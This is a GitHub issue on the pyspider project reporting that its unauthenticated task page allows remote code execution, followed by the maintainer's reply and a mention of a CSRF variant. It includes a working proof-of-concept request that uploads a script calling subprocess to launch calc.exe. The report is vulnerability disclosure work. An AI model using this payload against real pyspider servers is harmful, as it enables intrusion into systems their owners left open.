Skip to content
This repository has been archived by the owner on Jun 10, 2024. It is now read-only.

Script content needs security check which could cause RCE #964

Open
lvf233 opened this issue Jan 19, 2021 · 2 comments
Open

Script content needs security check which could cause RCE #964

lvf233 opened this issue Jan 19, 2021 · 2 comments

Comments

@lvf233
Copy link

lvf233 commented Jan 19, 2021

🐛 Bug Report

Script content needs security check which could cause RCE

To Reproduce

  1. start up a pyspider-server.
  2. access the task webpage.
  3. upload a task with malicious script.
  4. bingo!

Expected behavior

the server will execute code what you set(it run with a calc.exe that i set to prove this vuln).

Test script or set of commands reproducing this issue

post this task as follow to server.

data = {
'webdav_mode': 'false',
'script':  '''from pyspider.libs.base_handler import *
import socket
import os
import sys
import time
import subprocess

def test():
    try:
        p=subprocess.call(["calc.exe",])
    except:
        pass
####  
class Handler(BaseHandler):
    def on_start(self):
        test()
''',
'task':'''{
  "process": {
    "callback": "on_start"
  },
  "project": "pyspider_test",
  "taskid": "data:,on_start",
  "url": "data:,on_start"
}
'''
}

Environment

pyspider v0.3.10
system ubuntu 18.04 & windows 10 version1909

@binux
Copy link
Owner

binux commented Jan 19, 2021

Yes, script running is the fundamental of this project. There's a warning on readme that you can setup auth to the task page.

@lvf233
Copy link
Author

lvf233 commented Jan 19, 2021

Yes, script running is the fundamental of this project. There's a warning on readme that you can setup auth to the task page.

yeah , most people still start pyspider with the default configuration, could force the modification of this default setting ? meanwhile, we also designed such a scene, which is opened in the case of only allowing localhost to access, while supporting JavaScript (using other components for rendering). We use the CSRF method to request the local pyspider to achieve the same effect.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants